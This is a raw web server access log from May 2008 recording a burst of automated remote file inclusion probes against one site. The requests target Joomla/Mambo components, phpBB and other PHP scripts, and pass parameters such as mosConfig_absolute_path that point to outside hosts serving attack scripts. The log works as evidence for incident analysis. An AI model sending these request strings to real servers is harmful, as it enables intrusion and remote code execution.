85.19.150.85 - - [06/May/2008:12:47:11 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:47:14 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:47:15 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.91.249.193 - - [06/May/2008:12:47:24 -0700] "GET //errors.php?_VALID_MOS=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.198.9.203 - - [06/May/2008:12:47:32 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [06/May/2008:12:47:32 -0700] "GET /postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.91.249.193 - - [06/May/2008:12:47:33 -0700] "GET /logs//errors.php?_VALID_MOS=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [06/May/2008:12:47:39 -0700] "GET /logs/access_071225.log//errors.php?_VALID_MOS=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:12:47:53 -0700] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:12:47:56 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:48:00 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:12:48:00 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:48:00 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.25.186 - - [06/May/2008:12:48:08 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [06/May/2008:12:48:09 -0700] "GET /postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [06/May/2008:12:48:09 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [06/May/2008:12:48:09 -0700] "GET /postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [06/May/2008:12:48:11 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [06/May/2008:12:48:11 -0700] "GET /postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:12:48:14 -0700] "GET /logs/access_071218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:12:48:21 -0700] "GET /logs/scanhttp://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:12:48:21 -0700] "GET /scanhttp://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:48:25 -0700] "GET /logs/access_080130.log//component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.21.58 - - [06/May/2008:12:48:25 -0700] "GET /logs/access_070925.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:48:25 -0700] "GET //component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:48:26 -0700] "GET /logs//component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.212.182 - - [06/May/2008:12:48:28 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.212.182 - - [06/May/2008:12:48:33 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:48:33 -0700] "GET /logs/access_080228.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:48:33 -0700] "GET //components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:48:34 -0700] "GET /logs//components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:48:37 -0700] "GET /logs/access_080228.log//components/com_lmo/index.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.212.182 - - [06/May/2008:12:48:37 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:12:48:37 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:12:48:37 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:48:37 -0700] "GET //components/com_lmo/index.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:12:48:37 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:48:38 -0700] "GET /logs//components/com_lmo/index.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:12:48:38 -0700] "GET /postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:12:48:41 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:12:48:42 -0700] "GET /postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [06/May/2008:12:48:51 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [06/May/2008:12:48:51 -0700] "GET /postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:49:00 -0700] "GET /logs/access_080122.log//component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:49:01 -0700] "GET /logs/access_080130.log//component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:49:02 -0700] "GET //component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:49:02 -0700] "GET /logs//component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:49:06 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.70.163 - - [06/May/2008:12:49:08 -0700] "GET //index.php?option=com_custompages&cpage=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
62.149.209.100 - - [06/May/2008:12:49:12 -0700] "GET /logs/access_080130.log//component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:49:12 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.209.100 - - [06/May/2008:12:49:12 -0700] "GET //component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.209.100 - - [06/May/2008:12:49:13 -0700] "GET /logs//component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:49:13 -0700] "GET /logs/access_080228.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:49:13 -0700] "GET /logs/access_080228.log//components/com_lmo/index.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:49:13 -0700] "GET //components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:49:14 -0700] "GET //components/com_lmo/index.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:49:14 -0700] "GET /logs//components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:49:14 -0700] "GET /logs//components/com_lmo/index.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:12:49:19 -0700] "GET /logs/access_071224.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:49:19 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:49:20 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.35.4.200 - - [06/May/2008:12:49:21 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [06/May/2008:12:49:21 -0700] "GET /postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.209.100 - - [06/May/2008:12:49:27 -0700] "GET /logs/access_080312.log//component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:49:30 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:49:35 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:49:40 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:49:40 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:49:40 -0700] "GET /logs/access_080122.log//component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.163 - - [06/May/2008:12:49:49 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.197.2 - - [06/May/2008:12:49:54 -0700] "GET /logs/access_080213.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [06/May/2008:12:49:54 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [06/May/2008:12:49:54 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.70.163 - - [06/May/2008:12:49:54 -0700] "GET //index.php?option=com_custompages&cpage=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [06/May/2008:12:49:54 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.193.222.176 - - [06/May/2008:12:50:00 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [06/May/2008:12:50:00 -0700] "GET /postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.198.9.203 - - [06/May/2008:12:50:25 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [06/May/2008:12:50:26 -0700] "GET /postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [06/May/2008:12:50:30 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [06/May/2008:12:50:31 -0700] "GET /postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.50.26 - - [06/May/2008:12:50:37 -0700] "GET /errors.php?error=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.61.90 - - [06/May/2008:12:50:40 -0700] "GET /logs/access_080315.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [06/May/2008:12:50:45 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [06/May/2008:12:50:45 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:50:49 -0700] "GET /logs//atom.php5?page=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.189.175.160 - - [06/May/2008:12:50:49 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:50:50 -0700] "GET //atom.php5?page=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.189.175.160 - - [06/May/2008:12:50:50 -0700] "GET /postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.50.26 - - [06/May/2008:12:50:59 -0700] "GET /logs/errors.php?error=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [06/May/2008:12:50:59 -0700] "GET /errors.php?error=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [06/May/2008:12:50:59 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [06/May/2008:12:50:59 -0700] "GET /errors.php?error=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [06/May/2008:12:50:59 -0700] "GET /logs/errors.php?error=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:51:01 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:51:02 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.50.26 - - [06/May/2008:12:51:03 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [06/May/2008:12:51:03 -0700] "GET /errors.php?error=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [06/May/2008:12:51:03 -0700] "GET /logs/errors.php?error=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.225 - - [06/May/2008:12:51:04 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://robubu.com/calendar/ws/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:51:04 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:51:05 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.255.60.225 - - [06/May/2008:12:51:10 -0700] "GET //index.php?option=com_custompages&cpage=http://robubu.com/calendar/ws/KaBo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.225 - - [06/May/2008:12:51:10 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://robubu.com/calendar/ws/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.238.208.61 - - [06/May/2008:12:51:17 -0700] "GET /logs/access_080130.log//component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.208.61 - - [06/May/2008:12:51:18 -0700] "GET //component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.208.61 - - [06/May/2008:12:51:18 -0700] "GET /logs//component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:51:21 -0700] "GET /logs/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:51:21 -0700] "GET /skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:12:51:23 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:12:51:24 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:12:51:24 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:12:51:24 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:12:51:24 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
189.236.5.128 - - [06/May/2008:12:51:24 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:12:51:25 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:12:51:25 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:12:51:25 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 27